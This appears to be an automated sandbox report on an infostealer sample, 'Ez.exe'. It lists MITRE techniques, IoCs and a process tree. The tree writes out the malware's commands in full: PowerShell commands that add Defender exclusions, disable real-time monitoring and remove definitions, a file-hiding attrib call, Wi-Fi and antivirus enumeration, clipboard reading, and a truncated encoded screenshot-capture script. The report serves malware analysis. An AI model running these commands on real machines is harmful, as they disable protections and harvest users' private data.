3046f37940ea9df7c118e89edd80b1903a49bced1986195d0fb9356f368479c6

Resubmissions

09-01-2025 16:52

250109-vdrc7axjhp 10

09-01-2025 16:52

09-01-2025 16:51

09-01-2025 16:51

09-01-2025 16:50

09-01-2025 16:43

Analysis

max time kernel
13s
max time network
18s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ez.exe
Size

5.8MB
MD5

988710d51a3c1b137dadffb2aa1d4bbd
SHA1

dd5399d7a78b8c6c73496cfc8aee9c55ac557ec9
SHA256

3046f37940ea9df7c118e89edd80b1903a49bced1986195d0fb9356f368479c6
SHA512

9f13eb8e3d9a0f8a7941232e5183141cd4b0973ae965d53f2ea2faeae203be638c222d6bab44a66f17f2e7267de2166af47cda99c0f10bdac101ca38684439f0
SSDEEP

98304:VtIu4+Dc0dR/JamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HEMCx43Z:4p+DXR/EeNoInY7/sHfbRy9fC5mDQTI

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4916	powershell.exe
1984	powershell.exe
2344	powershell.exe
1508	powershell.exe
2800	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Ez.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4704	cmd.exe
3948	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1488	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe
2700	Ez.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
32	discord.com
31	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com
14	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2276	tasklist.exe
536	tasklist.exe
2464	tasklist.exe
4188	tasklist.exe
2932	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4088	cmd.exe

UPX packed file 42 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b88-21.dat	upx
behavioral1/memory/2700-25-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp	upx
behavioral1/files/0x000c000000023a9f-27.dat	upx
behavioral1/files/0x000a000000023b86-31.dat	upx
behavioral1/memory/2700-30-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp	upx
behavioral1/memory/2700-48-0x00007FFA0D090000-0x00007FFA0D09F000-memory.dmp	upx
behavioral1/files/0x000c000000023ae1-47.dat	upx
behavioral1/files/0x000c000000023ae0-46.dat	upx
behavioral1/files/0x000e000000023adf-45.dat	upx
behavioral1/files/0x0009000000023ad4-44.dat	upx
behavioral1/files/0x0008000000023ad0-43.dat	upx
behavioral1/files/0x0008000000023ace-42.dat	upx
behavioral1/files/0x000d000000023aa4-41.dat	upx
behavioral1/files/0x000d000000023a73-40.dat	upx
behavioral1/files/0x000a000000023b8d-39.dat	upx
behavioral1/files/0x000a000000023b8c-38.dat	upx
behavioral1/files/0x000a000000023b8b-37.dat	upx
behavioral1/files/0x000a000000023b87-34.dat	upx
behavioral1/files/0x000a000000023b85-33.dat	upx
behavioral1/memory/2700-54-0x00007FFA05200000-0x00007FFA0522D000-memory.dmp	upx
behavioral1/memory/2700-56-0x00007FFA05040000-0x00007FFA05059000-memory.dmp	upx
behavioral1/memory/2700-58-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp	upx
behavioral1/memory/2700-60-0x00007FFA04600000-0x00007FFA04769000-memory.dmp	upx
behavioral1/memory/2700-62-0x00007FFA04F20000-0x00007FFA04F39000-memory.dmp	upx
behavioral1/memory/2700-64-0x00007FFA04F10000-0x00007FFA04F1D000-memory.dmp	upx
behavioral1/memory/2700-66-0x00007FFA04E10000-0x00007FFA04E3E000-memory.dmp	upx
behavioral1/memory/2700-71-0x00007FF9F5DD0000-0x00007FF9F5E88000-memory.dmp	upx
behavioral1/memory/2700-74-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp	upx
behavioral1/memory/2700-73-0x00007FF9F5A50000-0x00007FF9F5DC5000-memory.dmp	upx
behavioral1/memory/2700-70-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp	upx
behavioral1/memory/2700-77-0x00007FFA04D90000-0x00007FFA04DA4000-memory.dmp	upx
behavioral1/memory/2700-80-0x00007FF9F5930000-0x00007FF9F5A48000-memory.dmp	upx
behavioral1/memory/2700-78-0x00007FFA04C60000-0x00007FFA04C6D000-memory.dmp	upx
behavioral1/memory/2700-91-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp	upx
behavioral1/memory/2700-118-0x00007FFA04F20000-0x00007FFA04F39000-memory.dmp	upx
behavioral1/memory/2700-267-0x00007FFA04E10000-0x00007FFA04E3E000-memory.dmp	upx
behavioral1/memory/2700-280-0x00007FF9F5DD0000-0x00007FF9F5E88000-memory.dmp	upx
behavioral1/memory/2700-285-0x00007FF9F5A50000-0x00007FF9F5DC5000-memory.dmp	upx
behavioral1/memory/2700-307-0x00007FFA04600000-0x00007FFA04769000-memory.dmp	upx
behavioral1/memory/2700-306-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp	upx
behavioral1/memory/2700-301-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp	upx
behavioral1/memory/2700-302-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2312	netsh.exe
3416	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4564	WMIC.exe
4356	WMIC.exe
5100	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3156	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1508	powershell.exe
2344	powershell.exe
1508	powershell.exe
2344	powershell.exe
2800	powershell.exe
2800	powershell.exe
3948	powershell.exe
3948	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
3948	powershell.exe
4916	powershell.exe
4916	powershell.exe
3872	powershell.exe
3872	powershell.exe
1984	powershell.exe
1984	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2464	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2580	WMIC.exe
Token: SeSecurityPrivilege	2580	WMIC.exe
Token: SeTakeOwnershipPrivilege	2580	WMIC.exe
Token: SeLoadDriverPrivilege	2580	WMIC.exe
Token: SeSystemProfilePrivilege	2580	WMIC.exe
Token: SeSystemtimePrivilege	2580	WMIC.exe
Token: SeProfSingleProcessPrivilege	2580	WMIC.exe
Token: SeIncBasePriorityPrivilege	2580	WMIC.exe
Token: SeCreatePagefilePrivilege	2580	WMIC.exe
Token: SeBackupPrivilege	2580	WMIC.exe
Token: SeRestorePrivilege	2580	WMIC.exe
Token: SeShutdownPrivilege	2580	WMIC.exe
Token: SeDebugPrivilege	2580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2580	WMIC.exe
Token: SeRemoteShutdownPrivilege	2580	WMIC.exe
Token: SeUndockPrivilege	2580	WMIC.exe
Token: SeManageVolumePrivilege	2580	WMIC.exe
Token: 33	2580	WMIC.exe
Token: 34	2580	WMIC.exe
Token: 35	2580	WMIC.exe
Token: 36	2580	WMIC.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeIncreaseQuotaPrivilege	2580	WMIC.exe
Token: SeSecurityPrivilege	2580	WMIC.exe
Token: SeTakeOwnershipPrivilege	2580	WMIC.exe
Token: SeLoadDriverPrivilege	2580	WMIC.exe
Token: SeSystemProfilePrivilege	2580	WMIC.exe
Token: SeSystemtimePrivilege	2580	WMIC.exe
Token: SeProfSingleProcessPrivilege	2580	WMIC.exe
Token: SeIncBasePriorityPrivilege	2580	WMIC.exe
Token: SeCreatePagefilePrivilege	2580	WMIC.exe
Token: SeBackupPrivilege	2580	WMIC.exe
Token: SeRestorePrivilege	2580	WMIC.exe
Token: SeShutdownPrivilege	2580	WMIC.exe
Token: SeDebugPrivilege	2580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2580	WMIC.exe
Token: SeRemoteShutdownPrivilege	2580	WMIC.exe
Token: SeUndockPrivilege	2580	WMIC.exe
Token: SeManageVolumePrivilege	2580	WMIC.exe
Token: 33	2580	WMIC.exe
Token: 34	2580	WMIC.exe
Token: 35	2580	WMIC.exe
Token: 36	2580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4564	WMIC.exe
Token: SeSecurityPrivilege	4564	WMIC.exe
Token: SeTakeOwnershipPrivilege	4564	WMIC.exe
Token: SeLoadDriverPrivilege	4564	WMIC.exe
Token: SeSystemProfilePrivilege	4564	WMIC.exe
Token: SeSystemtimePrivilege	4564	WMIC.exe
Token: SeProfSingleProcessPrivilege	4564	WMIC.exe
Token: SeIncBasePriorityPrivilege	4564	WMIC.exe
Token: SeCreatePagefilePrivilege	4564	WMIC.exe
Token: SeBackupPrivilege	4564	WMIC.exe
Token: SeRestorePrivilege	4564	WMIC.exe
Token: SeShutdownPrivilege	4564	WMIC.exe
Token: SeDebugPrivilege	4564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4564	WMIC.exe
Token: SeRemoteShutdownPrivilege	4564	WMIC.exe
Token: SeUndockPrivilege	4564	WMIC.exe
Token: SeManageVolumePrivilege	4564	WMIC.exe
Token: 33	4564	WMIC.exe
Token: 34	4564	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 548 wrote to memory of 2700	548	Ez.exe	85
PID 548 wrote to memory of 2700	548	Ez.exe	85
PID 2700 wrote to memory of 5000	2700	Ez.exe	86
PID 2700 wrote to memory of 5000	2700	Ez.exe	86
PID 2700 wrote to memory of 2944	2700	Ez.exe	87
PID 2700 wrote to memory of 2944	2700	Ez.exe	87
PID 2700 wrote to memory of 4388	2700	Ez.exe	90
PID 2700 wrote to memory of 4388	2700	Ez.exe	90
PID 2700 wrote to memory of 652	2700	Ez.exe	92
PID 2700 wrote to memory of 652	2700	Ez.exe	92
PID 4388 wrote to memory of 2464	4388	cmd.exe	94
PID 4388 wrote to memory of 2464	4388	cmd.exe	94
PID 5000 wrote to memory of 1508	5000	cmd.exe	95
PID 5000 wrote to memory of 1508	5000	cmd.exe	95
PID 652 wrote to memory of 2580	652	cmd.exe	96
PID 652 wrote to memory of 2580	652	cmd.exe	96
PID 2944 wrote to memory of 2344	2944	cmd.exe	97
PID 2944 wrote to memory of 2344	2944	cmd.exe	97
PID 2700 wrote to memory of 4524	2700	Ez.exe	99
PID 2700 wrote to memory of 4524	2700	Ez.exe	99
PID 4524 wrote to memory of 2276	4524	cmd.exe	142
PID 4524 wrote to memory of 2276	4524	cmd.exe	142
PID 2700 wrote to memory of 3592	2700	Ez.exe	102
PID 2700 wrote to memory of 3592	2700	Ez.exe	102
PID 3592 wrote to memory of 3316	3592	cmd.exe	104
PID 3592 wrote to memory of 3316	3592	cmd.exe	104
PID 2700 wrote to memory of 1488	2700	Ez.exe	105
PID 2700 wrote to memory of 1488	2700	Ez.exe	105
PID 1488 wrote to memory of 4564	1488	cmd.exe	107
PID 1488 wrote to memory of 4564	1488	cmd.exe	107
PID 2700 wrote to memory of 1460	2700	Ez.exe	108
PID 2700 wrote to memory of 1460	2700	Ez.exe	108
PID 1460 wrote to memory of 4356	1460	cmd.exe	148
PID 1460 wrote to memory of 4356	1460	cmd.exe	148
PID 2700 wrote to memory of 4088	2700	Ez.exe	111
PID 2700 wrote to memory of 4088	2700	Ez.exe	111
PID 2700 wrote to memory of 2124	2700	Ez.exe	113
PID 2700 wrote to memory of 2124	2700	Ez.exe	113
PID 4088 wrote to memory of 2784	4088	cmd.exe	115
PID 4088 wrote to memory of 2784	4088	cmd.exe	115
PID 2124 wrote to memory of 2800	2124	cmd.exe	116
PID 2124 wrote to memory of 2800	2124	cmd.exe	116
PID 2700 wrote to memory of 3392	2700	Ez.exe	117
PID 2700 wrote to memory of 3392	2700	Ez.exe	117
PID 2700 wrote to memory of 1920	2700	Ez.exe	118
PID 2700 wrote to memory of 1920	2700	Ez.exe	118
PID 1920 wrote to memory of 4188	1920	cmd.exe	121
PID 1920 wrote to memory of 4188	1920	cmd.exe	121
PID 3392 wrote to memory of 2932	3392	cmd.exe	122
PID 3392 wrote to memory of 2932	3392	cmd.exe	122
PID 2700 wrote to memory of 3416	2700	Ez.exe	123
PID 2700 wrote to memory of 3416	2700	Ez.exe	123
PID 2700 wrote to memory of 3252	2700	Ez.exe	124
PID 2700 wrote to memory of 3252	2700	Ez.exe	124
PID 2700 wrote to memory of 4704	2700	Ez.exe	125
PID 2700 wrote to memory of 4704	2700	Ez.exe	125
PID 2700 wrote to memory of 808	2700	Ez.exe	126
PID 2700 wrote to memory of 808	2700	Ez.exe	126
PID 2700 wrote to memory of 1032	2700	Ez.exe	127
PID 2700 wrote to memory of 1032	2700	Ez.exe	127
PID 2700 wrote to memory of 3680	2700	Ez.exe	128
PID 2700 wrote to memory of 3680	2700	Ez.exe	128
PID 2700 wrote to memory of 2772	2700	Ez.exe	135
PID 2700 wrote to memory of 2772	2700	Ez.exe	135

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2784	attrib.exe
2976	attrib.exe
208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ez.exe
"C:\Users\Admin\AppData\Local\Temp\Ez.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:548
- C:\Users\Admin\AppData\Local\Temp\Ez.exe
  "C:\Users\Admin\AppData\Local\Temp\Ez.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ez.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ez.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4524
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ez.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ez.exe"
      4⤵
      Views/modifies file attributes
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3416
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3252
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:808
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1032
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3680
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2772
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4Acw